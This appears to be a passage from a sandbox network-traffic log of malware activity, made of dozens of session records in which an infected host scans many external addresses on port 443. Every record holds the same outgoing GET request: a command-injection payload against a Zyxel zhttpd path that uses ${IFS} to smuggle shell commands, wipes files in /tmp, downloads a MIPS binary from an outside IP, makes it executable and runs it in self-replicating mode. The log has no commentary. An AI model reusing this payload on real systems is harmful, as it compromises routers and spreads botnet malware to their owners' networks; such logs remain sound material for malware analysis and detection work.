                                                Jan 12, 2024 18:24:22.518353939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1022192.168.2.135795281.46.215.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518388987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1023192.168.2.1346794199.122.40.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518414974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1024192.168.2.134725635.189.235.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518465042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1025192.168.2.134127492.96.238.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518518925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1026192.168.2.135060298.119.1.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518568039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1027192.168.2.135693251.94.186.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518598080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1028192.168.2.1336884108.3.212.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518630981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1029192.168.2.134386644.152.203.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518661022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1030192.168.2.1346082196.110.102.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518687010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1031192.168.2.13490589.148.1.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518707037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1032192.168.2.1358066194.50.253.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518767118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1033192.168.2.1350332106.232.230.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518812895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1034192.168.2.1352452180.168.106.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518836975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1035192.168.2.1359708101.75.136.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518889904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1036192.168.2.134607466.185.52.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518923044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1037192.168.2.1343008206.132.163.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518965960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1038192.168.2.133530662.80.229.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.518997908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1039192.168.2.134615483.29.32.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519052982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1040192.168.2.1341930178.108.42.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519085884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1041192.168.2.1334498201.75.10.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519133091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1042192.168.2.1341722183.44.4.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519166946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1043192.168.2.1350462160.150.186.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519196987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1044192.168.2.1360652201.140.247.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519249916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1045192.168.2.134896217.14.110.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519284964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1046192.168.2.133707296.204.71.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519318104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1047192.168.2.1357058112.181.245.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519356012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1048192.168.2.1349754157.193.117.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519397974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1049192.168.2.1355198174.139.214.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519424915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1050192.168.2.134168645.83.188.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519468069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1051192.168.2.1350702218.208.206.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519493103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1052192.168.2.1335744166.113.248.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519526005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1053192.168.2.135538425.29.169.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519589901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1054192.168.2.1360172202.113.178.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519618034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1055192.168.2.1358098197.122.233.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519664049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1056192.168.2.1341496105.88.158.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519726992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1057192.168.2.135708241.71.117.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519748926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1058192.168.2.1352880131.150.194.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519769907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1059192.168.2.1342224106.223.91.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519820929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1060192.168.2.135127250.71.205.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519840002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1061192.168.2.1356732217.167.94.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519897938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1062192.168.2.1341816102.176.66.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519922018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1063192.168.2.1354582161.156.233.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519958019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1064192.168.2.134243050.5.128.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.519989967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1065192.168.2.1341854181.30.106.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520026922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1066192.168.2.1352086128.244.103.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520076990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1067192.168.2.135436643.254.200.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520123005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1068192.168.2.1351772145.135.103.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520165920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1069192.168.2.1352992129.76.8.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520190954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1070192.168.2.1334636106.148.110.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520256996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1071192.168.2.1335252220.245.104.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520308971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1072192.168.2.134070293.212.36.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520365953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1073192.168.2.134077689.154.99.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520431042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1074192.168.2.1349864218.147.112.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520466089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1075192.168.2.1340888170.105.48.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520467997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1076192.168.2.1344754168.23.105.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520467997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1077192.168.2.1336324136.77.118.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520479918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1078192.168.2.133928890.90.153.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520522118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1079192.168.2.135572480.167.94.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520592928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1080192.168.2.1335896112.235.11.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520637989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1081192.168.2.133691477.15.251.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520667076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1082192.168.2.1335952162.138.88.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520729065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1083192.168.2.1335730118.161.10.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:22.520791054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1084192.168.2.134882292.65.51.27443
                                                TimestampBytes transferredDirectionData
